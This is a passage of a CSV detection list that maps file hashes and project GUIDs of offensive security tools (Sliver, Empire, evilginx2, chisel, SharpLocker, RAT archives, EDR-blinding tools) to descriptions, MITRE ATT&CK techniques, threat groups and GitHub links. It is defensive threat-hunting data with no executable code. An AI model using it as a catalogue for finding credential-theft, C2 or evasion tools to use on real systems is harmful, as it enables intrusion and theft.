"*6e7d2c54b036019f32df4238d9f26e97efe246df82c687ee8033c7c9fe5a9f09*",".{0,1000}6e7d2c54b036019f32df4238d9f26e97efe246df82c687ee8033c7c9fe5a9f09.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","28617"
"*6e8b43f3e3287e95a7e9debd065e5915d9a557b1c8191d388939fb1169c79041*",".{0,1000}6e8b43f3e3287e95a7e9debd065e5915d9a557b1c8191d388939fb1169c79041.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28619"
"*6E8D2C12-255B-403C-9EF3-8A097D374DB2*",".{0,1000}6E8D2C12\-255B\-403C\-9EF3\-8A097D374DB2.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","#GUIDproject","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","28621"
"*6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876*",".{0,1000}6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28622"
"*6e92e67cb6ae23615bdaf6e2f238e9d99a3fbba4ab3f9118f2a53b73302c2c97*",".{0,1000}6e92e67cb6ae23615bdaf6e2f238e9d99a3fbba4ab3f9118f2a53b73302c2c97.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28623"
"*6e97ff7ed0f51797300080bd5b39662c9b78693b54f7b3bb3da80b3be20cf076*",".{0,1000}6e97ff7ed0f51797300080bd5b39662c9b78693b54f7b3bb3da80b3be20cf076.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28624"
"*6e9cafc470be9e0db016266a1e663e39d0c764649629a6d0e28c18f103b67a43*",".{0,1000}6e9cafc470be9e0db016266a1e663e39d0c764649629a6d0e28c18f103b67a43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","28625"
"*6e9f98db374c8bbf0dedd27e6576c3bc8d800465afef91b99220c85401cc4e4c*",".{0,1000}6e9f98db374c8bbf0dedd27e6576c3bc8d800465afef91b99220c85401cc4e4c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28626"
"*6ea5ef1dadc07545a736c48425df63f6d95abd70ff2bd41975948cd5ad5e5788*",".{0,1000}6ea5ef1dadc07545a736c48425df63f6d95abd70ff2bd41975948cd5ad5e5788.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28628"
"*6eab9e77c73f2eedae88d1b7cc7b7f2b5f23dc5c7a6110a50a1167ccfcb53769*",".{0,1000}6eab9e77c73f2eedae88d1b7cc7b7f2b5f23dc5c7a6110a50a1167ccfcb53769.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28630"
"*6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3*",".{0,1000}6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28631"
"*6eac306cec3650ed8740d82024380ccaaea2ac4b8f6b55119a9e5fb82485f67f*",".{0,1000}6eac306cec3650ed8740d82024380ccaaea2ac4b8f6b55119a9e5fb82485f67f.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","28632"
"*6EB55FE6-C11C-453B-8B32-22B689B6B3E2*",".{0,1000}6EB55FE6\-C11C\-453B\-8B32\-22B689B6B3E2.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#GUIDproject","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","28633"
"*6ec25122b3ffbf7f7dfcc44141b5e8df729a9bdde5ae169275d8fe75b0ea486f*",".{0,1000}6ec25122b3ffbf7f7dfcc44141b5e8df729a9bdde5ae169275d8fe75b0ea486f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28636"
"*6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2*",".{0,1000}6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28637"
"*6ecb62923d16588654c77ad581388eb27873b09c2ff642cd8303c8a2d577fe53*",".{0,1000}6ecb62923d16588654c77ad581388eb27873b09c2ff642cd8303c8a2d577fe53.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28639"
"*6ed116ea8ed867e975f1563cd931fb3b28931a66d8e5548c3ee8fdb58faf538e*",".{0,1000}6ed116ea8ed867e975f1563cd931fb3b28931a66d8e5548c3ee8fdb58faf538e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28640"
"*6ed65758ecfa41680c567082d18526278b6e446b37046b578c6b1bf531d81f59*",".{0,1000}6ed65758ecfa41680c567082d18526278b6e446b37046b578c6b1bf531d81f59.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28641"
"*6ee3947419cd0fef3a7f1a91c44563880eeaba7103092803aac28814ad0df101*",".{0,1000}6ee3947419cd0fef3a7f1a91c44563880eeaba7103092803aac28814ad0df101.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28646"
"*6ee4bce37718d56dc3171c02415b0163d68d808342e5c0ba15851f6e48e77420*",".{0,1000}6ee4bce37718d56dc3171c02415b0163d68d808342e5c0ba15851f6e48e77420.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","28647"
"*6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567*",".{0,1000}6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28648"
"*6eebfee28898a816e8f645da2d5e7a2f7dcc584997eb667f909e386bd3389fe7*",".{0,1000}6eebfee28898a816e8f645da2d5e7a2f7dcc584997eb667f909e386bd3389fe7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28651"
"*6ef0e134f1bf610e27cf4c99c2402bd74d00ea214cb6aa34daf4e99cfa66270a*",".{0,1000}6ef0e134f1bf610e27cf4c99c2402bd74d00ea214cb6aa34daf4e99cfa66270a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28652"
"*6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06*",".{0,1000}6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28653"
"*6ef7a5a0d7eb7976141aa9d61242969b0dee3e8a7dddb6259c1bd539b68dcad8*",".{0,1000}6ef7a5a0d7eb7976141aa9d61242969b0dee3e8a7dddb6259c1bd539b68dcad8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","28654"
"*6ef83e490ccff661262cb10a37850b957ceb1da55a680321e1d354bf7a036c10*",".{0,1000}6ef83e490ccff661262cb10a37850b957ceb1da55a680321e1d354bf7a036c10.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28655"
"*6ef8c3bbcd03ba52b59a3f6115c6fba39e9578c0f2c6379f17a6f421f944e1fa*",".{0,1000}6ef8c3bbcd03ba52b59a3f6115c6fba39e9578c0f2c6379f17a6f421f944e1fa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28656"
"*6ef90637f19f9be257697a77dada7d97a1655705e821aa4b51eda2eed6e8751f*",".{0,1000}6ef90637f19f9be257697a77dada7d97a1655705e821aa4b51eda2eed6e8751f.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","28657"
"*6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f*",".{0,1000}6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28659"
"*6EFFA73B-AB71-4594-AEFF-1C127387A9CE*",".{0,1000}6EFFA73B\-AB71\-4594\-AEFF\-1C127387A9CE.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","28661"
"*6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5*",".{0,1000}6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28664"
"*6f14aa417bc4b85c47ef65bfed84e2b7728b1cb8bdd1c0cfc6eb6cd7fd0db7c0*",".{0,1000}6f14aa417bc4b85c47ef65bfed84e2b7728b1cb8bdd1c0cfc6eb6cd7fd0db7c0.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","28666"
"*6f1799422f0ccd2417e550b20fec04fcc7f1d9ec78aaa1415456b3068f673f6b*",".{0,1000}6f1799422f0ccd2417e550b20fec04fcc7f1d9ec78aaa1415456b3068f673f6b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28667"
"*6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18*",".{0,1000}6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28668"
"*6f27c494cd5373780458b9ed4ccf9bb172f1782e8e2c1dc630793dfe26ea82fe*",".{0,1000}6f27c494cd5373780458b9ed4ccf9bb172f1782e8e2c1dc630793dfe26ea82fe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28670"
"*6f2a53476cbc09bbffe7e07d6e9dd19d*",".{0,1000}6f2a53476cbc09bbffe7e07d6e9dd19d.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","28671"
"*6f2b8cefcfe918b0e6ae0449e03ee2bc0cfe9224dff57271478ebb5110965ffd*",".{0,1000}6f2b8cefcfe918b0e6ae0449e03ee2bc0cfe9224dff57271478ebb5110965ffd.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","28672"
"*6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e*",".{0,1000}6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28673"
"*6f3476967a8ef65e491229af8ddfb6a9958a346f151b9bce48122e1a04b97539*",".{0,1000}6f3476967a8ef65e491229af8ddfb6a9958a346f151b9bce48122e1a04b97539.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","28674"
"*6F3899086ACCAB2E2686ADB078E049066754D0EE7798666042416CEF566F65E0*",".{0,1000}6F3899086ACCAB2E2686ADB078E049066754D0EE7798666042416CEF566F65E0.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","28677"
"*6f3c6aacdcbeacc32a31e6ad49ac47e3f9d315ef277fe75125f7e596b592310e*",".{0,1000}6f3c6aacdcbeacc32a31e6ad49ac47e3f9d315ef277fe75125f7e596b592310e.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","28679"
"*6f430900ee17bc63c79e6c42bfff16829205948b1e136bd4bc6d02301ba09d76*",".{0,1000}6f430900ee17bc63c79e6c42bfff16829205948b1e136bd4bc6d02301ba09d76.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","28680"
"*6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d*",".{0,1000}6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#filehash","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","28682"
"*6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7*",".{0,1000}6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","28684"
"*6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45*",".{0,1000}6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation 